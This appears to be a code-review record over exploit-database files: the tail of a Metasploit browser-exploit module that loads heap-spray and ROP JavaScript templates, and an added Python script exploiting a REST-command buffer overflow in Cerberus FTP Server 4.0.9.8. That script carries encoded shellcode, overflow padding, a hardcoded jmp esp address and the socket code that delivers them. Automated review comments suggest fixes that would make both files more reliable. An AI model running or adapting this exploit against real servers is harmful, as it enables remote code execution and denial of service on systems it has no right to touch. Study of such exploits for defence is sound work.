File.open(path, 'rb') { |f| template = strip_comments(f.read) }
|
||||
|
||||
return template, binding()
|
||||
end
|
||||
|
||||
def exploit_template(cli, target_info)
|
||||
shellcode = Rex::Text.to_hex(get_payload(cli, target_info))
|
||||
|
||||
path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'exploit.js')
|
||||
template = ''
|
||||
File.open(path, 'rb') { |f| template = strip_comments(f.read) }
|
||||
|
||||
return template, binding()
|
||||
end
|
||||
|
||||
def sprayer_template(cli, target_info)
|
||||
path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'sprayer.js')
|
||||
template = ''
|
||||
File.open(path, 'rb') { |f| template = strip_comments(f.read) }
|
||||
|
||||
return template, binding()
|
||||
end
|
||||
|
||||
def informer_template(cli, target_info)
|
||||
path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'informer.js')
|
||||
template = ''
|
||||
File.open(path, 'rb') { |f| template = strip_comments(f.read) }
|
||||
|
||||
return template, binding()
|
||||
end
|
||||
|
||||
def rop_builder_template(cli, target_info)
|
||||
path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'rop_builder.js')
|
||||
template = ''
|
||||
File.open(path, 'rb') { |f| template = strip_comments(f.read) }
|
||||
|
||||
return template, binding()
|
||||
end
|
||||
|
||||
def strip_comments(input)
|
||||
input.gsub(/\/\/.*$/, '')
|
||||
end
|
||||
|
||||
end
|
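Review bot: `strip_comments` near the end of the file (`input.gsub(/\/\/.*$/, '')`) removes everything from the first `//` to the end of each line, so a template line that carries `//` inside a string or regex literal — a `http://` URL, for instance — would be truncated before it is served; whether the edb-35948 templates contain such lines is not visible here. Either restrict it to whole-line comments, `input.gsub(%r{^\s*//.*$}, '')`, or state the constraint above the method with `# Drops '//' to end of line, including inside string literals: templates must not embed '//'.` so the next template author knows. The five `*_template` methods repeat the same `::File.join` / `File.open` / `strip_comments` sequence; a helper along the lines of `strip_comments(File.binread(::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', *parts)))` would leave each method with only its own locals and the `binding()` return. The `when /exploit.js/` patterns in `on_request_exploit` are unanchored with an unescaped `.`; `/exploit\.js\z/` says what is actually meant.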
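--- a/platforms/windows/remote/36111.py
+++ b/platforms/windows/remote/36111.py
@@ -0,0 +1,143 @@
+source: http://www.securityfocus.com/bid/49444/info
+
+Cerberus FTP Server is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
+
+Attackers can exploit this issue to execute arbitrary code within the context of the application. Failed attacks may cause a denial-of-service condition.
+
+Cerberus FTP Server 4.0.9.8 is vulnerable; other versions may also be affected.
+
+NOTE: The vendor refutes this issue stating the issue can not be replicated as described.
+
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
+0 _ __ __ __ 1
+1 /' \ __ /'__`\ /\ \__ /'__`\ 0
+0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
+1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
+0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
+1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
+0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
+1 \ \____/ >> Exploit database separated by exploit 0
+0 \/___/ type (local, remote, DoS, etc.) 1
+1 1
+0 [+] Site : 1337day.com 0
+1 [+] Support e-mail : submit[at]1337day.com 1
+0 0
+1 ######################################### 1
+0 I'm KedAns-Dz member from Inj3ct0r Team 1
+1 ######################################### 0
+0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
+
+###
+# Title : Cerberus FTP Server 4.0.9.8 (REST) Remote BOF and Crash Exploit
+# Author : KedAns-Dz
+# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
+# Home : Hassi.Messaoud (30008) - Algeria -(00213555248701)
+# Web Site : www.1337day.com * www.exploit-id.com * sec4ever.com
+# Facebook : http://facebook.com/KedAns
+# platform : windows
+# Impact : Remote Buffer Overflow ( in REST command)
+# Tested on : Windows XP SP3 (en)
+##
+
+##
+# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
+# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
+# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * H-KinG |
+# | ------------------------------------------------- < |
+###
+
+#=====[ Exploit Code ]======>
+
+#!/usr/bin/python
+
+# Cerberus FTP Server 4.0.9.8 (REST) Remote BOF and Crash Exploit
+# Provided by : KedAns-Dz * Inj3ct0r Team
+
+import errno
+from os import strerror
+from socket import *
+import sys
+from time import sleep
+from struct import pack
+
+if len(sys.argv) != 3:
+print "[*]Usage: python %s <ip> <port>" % sys.argv[0]
+print "[*]Exemple: python %s 192.168.1.2 21" % sys.argv[0]
+sys.exit(0)
+ip = sys.argv[1]
+port = int(sys.argv[2])
+
+# windows/exec | cmd=calc.exe | x86/alpha_mixed (http://metasploit.com)
+shellcode = ("\x56\x54\x58\x36\x33\x30\x56\x58\x48\x34\x39\x48\x48\x48"
+"\x50\x68\x59\x41\x41\x51\x68\x5a\x59\x59\x59\x59\x41\x41"
+"\x51\x51\x44\x44\x44\x64\x33\x36\x46\x46\x46\x46\x54\x58"
+"\x56\x6a\x30\x50\x50\x54\x55\x50\x50\x61\x33\x30\x31\x30"
+"\x38\x39\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+"\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41"
+"\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42"
+"\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x4b"
+"\x58\x4e\x69\x43\x30\x43\x30\x43\x30\x43\x50\x4f\x79\x4b"
+"\x55\x45\x61\x4e\x32\x43\x54\x4c\x4b\x42\x72\x50\x30\x4c"
+"\x4b\x42\x72\x44\x4c\x4e\x6b\x43\x62\x42\x34\x4c\x4b\x43"
+"\x42\x45\x78\x46\x6f\x4d\x67\x51\x5a\x51\x36\x50\x31\x49"
+"\x6f\x50\x31\x4b\x70\x4c\x6c\x45\x6c\x43\x51\x51\x6c\x47"
+"\x72\x46\x4c\x51\x30\x49\x51\x4a\x6f\x46\x6d\x47\x71\x4a"
+"\x67\x4a\x42\x4a\x50\x46\x32\x51\x47\x4c\x4b\x43\x62\x44"
+"\x50\x4e\x6b\x42\x62\x45\x6c\x47\x71\x4e\x30\x4c\x4b\x47"
+"\x30\x50\x78\x4e\x65\x49\x50\x50\x74\x51\x5a\x46\x61\x4e"
+"\x30\x50\x50\x4c\x4b\x51\x58\x45\x48\x4e\x6b\x43\x68\x45"
+"\x70\x47\x71\x4b\x63\x4a\x43\x45\x6c\x47\x39\x4c\x4b\x47"
+"\x44\x4c\x4b\x46\x61\x48\x56\x50\x31\x49\x6f\x46\x51\x4f"
+"\x30\x4e\x4c\x4b\x71\x4a\x6f\x44\x4d\x47\x71\x4a\x67\x44"
+"\x78\x49\x70\x44\x35\x48\x74\x45\x53\x51\x6d\x4a\x58\x45"
+"\x6b\x51\x6d\x44\x64\x44\x35\x48\x62\x51\x48\x4e\x6b\x51"
+"\x48\x47\x54\x43\x31\x4b\x63\x43\x56\x4e\x6b\x46\x6c\x42"
+"\x6b\x4c\x4b\x43\x68\x47\x6c\x46\x61\x4a\x73\x4e\x6b\x43"
+"\x34\x4e\x6b\x47\x71\x48\x50\x4c\x49\x51\x54\x51\x34\x45"
+"\x74\x43\x6b\x43\x6b\x50\x61\x46\x39\x51\x4a\x42\x71\x4b"
+"\x4f\x4d\x30\x50\x58\x51\x4f\x50\x5a\x4e\x6b\x46\x72\x4a"
+"\x4b\x4b\x36\x43\x6d\x51\x7a\x46\x61\x4e\x6d\x4f\x75\x4d"
+"\x69\x43\x30\x47\x70\x45\x50\x50\x50\x42\x48\x44\x71\x4c"
+"\x4b\x50\x6f\x4b\x37\x4b\x4f\x4a\x75\x4f\x4b\x4a\x50\x4d"
+"\x65\x4e\x42\x42\x76\x50\x68\x4e\x46\x4e\x75\x4f\x4d\x4d"
+"\x4d\x4b\x4f\x4e\x35\x47\x4c\x44\x46\x51\x6c\x44\x4a\x4d"
+"\x50\x49\x6b\x49\x70\x42\x55\x46\x65\x4f\x4b\x47\x37\x45"
+"\x43\x51\x62\x50\x6f\x42\x4a\x47\x70\x50\x53\x49\x6f\x49"
+"\x45\x50\x63\x51\x71\x42\x4c\x42\x43\x46\x4e\x50\x65\x51"
+"\x68\x43\x55\x45\x50\x41\x41")
+buf = "\x41" * 244
+buf += pack('<L',0x7C874413) # jmp esp - from (kernel32.dll)
+buf += "\x90" * 50
+buf += shellcode
+
+print "[+]Connecting with server..."
+sleep(1)
+try:
+s = socket(AF_INET,SOCK_STREAM)
+s.connect((ip,port))
+s.recv(1024)
+s.send("USER test\r\n")
+s.recv(1024)
+s.send("PASS test\r\n")
+s.recv(1024)
+s.send("REST "+buf+"\r\n")
+s.close()
+s = socket(AF_INET,SOCK_STREAM)
+s.connect((ip,port))# Connected again to Crash and BOF
+sleep(1)
+s.close()# Close connection and Crash!!!
+print "[+]Exploit sent with sucess"
+except:
+print "[-]Error in connection with server: "+ip
+
+#=====[ The End ]=======|
+
+#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
+# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > + Rizky Ariestiyansyah * Islam Caddy <3
+# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
+# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * SeeMe * XroGuE * ZoRLu * gunslinger_
+# anT!-Tr0J4n * ^Xecuti0N3r * Kalashinkov3 (www.1337day.com/team) * Dz Offenders Cr3w * Sec4ever
+# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
+# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * H-KinG * www.packetstormsecurity.org * TreX (hotturks.org)
+# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
+#=================================================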
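Review bot: The bare `except:` closing the `try` block catches every exception, including `KeyboardInterrupt` and `SystemExit`, and reports all of them as a connection error with the server, so a failed `send`/`recv` or a plain bug in the script is indistinguishable from an unreachable host. Catching the socket error class that `from socket import *` already brings into scope and carrying it into the message, `except error as e:` / `print "[-]Error in connection with server: %s (%s)" % (ip, e)`, keeps the original wording while preserving the cause. `errno` and `strerror` are imported but never used. The advisory text and banner above `#!/usr/bin/python` are not Python, so the file as committed is a text record rather than a runnable script; a one-line note above the shebang saying the script starts there would spare the next reader a syntax error.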